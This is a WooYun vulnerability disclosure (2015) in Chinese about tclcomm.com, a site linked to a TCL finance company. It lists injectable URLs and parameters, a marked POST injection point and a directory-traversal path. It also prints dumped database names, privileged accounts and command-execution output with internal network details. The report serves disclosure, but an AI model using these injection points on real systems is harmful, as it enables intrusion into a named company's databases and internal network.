当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104650

漏洞标题:TCL某站SQL注入打包

相关厂商:TCL集团财务有限公司

漏洞作者: 路人甲

提交时间:2015-03-31 15:24

修复时间:2015-04-05 15:26

公开时间:2015-04-05 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

TCL某站SQL注入打包

详细说明:

废话不多说,直接给出存在注入的链接
http://tclcomm.com/service/serinter.asp?type=%BD%BB%BB%BB%BB%FA 问题参数type
http://tclcomm.com/service/sernet1.asp?id=%E7%94%98%E8%82%83 问题参数id
http://tclcomm.com/purchase/info.asp?typeid=5 问题参数typeid
http://tclcomm.com/product/lefttop.asp?LanmuID=137&Pid=845&TypeID=12 问题参数Pid
http://tclcomm.com/zhaopin/zhaopin_detail.asp?zpid=152 问题参数zpid
http://tclcomm.com/news/newssearch.asp
POST keynews=1*&x=25&y=14 问题参数keynews
另外还有个地方可以遍历目录:
http://www.tclcomm.com/purchase/profiledown.asp?myPath=\qiyexingxiang\..\..\..\..\\WWW

漏洞证明:

available databases [11]:
[*] Finance
[*] hrmsys
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] txcard2012
[*] txcard20130402
[*] web
sa权限
database management system users privileges:
[*] BUILTIN\\Administrators
[*] MRPII_USER (administrator)
[*] sa_hr
[*] txhr (administrator)
[*] ut
[*] uttest
[*] websa (administrator)
[*] wwwsa
可以执行命令:
当前用户是 com\zhangwei
ipconfig
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address . . . . . . . . . . . : 10.90.1.250
Subnet Mask . . . . . . . . . . . : 255.255.248.0
Default Gateway . . . . . . . . . : 10.90.0.1

tcl.jpg

修复方案:

你们更专业

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-05 15:26

厂商回复:

最新状态:

暂无